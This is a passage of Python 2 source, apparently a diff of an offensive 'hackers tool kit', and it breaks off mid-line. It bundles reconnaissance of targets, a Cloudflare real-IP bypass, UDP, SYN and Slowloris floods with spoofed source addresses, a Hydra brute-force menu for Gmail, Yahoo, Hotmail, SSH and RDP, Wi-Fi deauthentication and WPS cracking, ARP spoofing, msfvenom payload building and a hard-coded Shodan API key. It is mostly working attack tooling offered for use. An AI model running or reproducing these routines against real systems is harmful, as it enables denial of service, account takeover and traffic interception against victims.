sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and 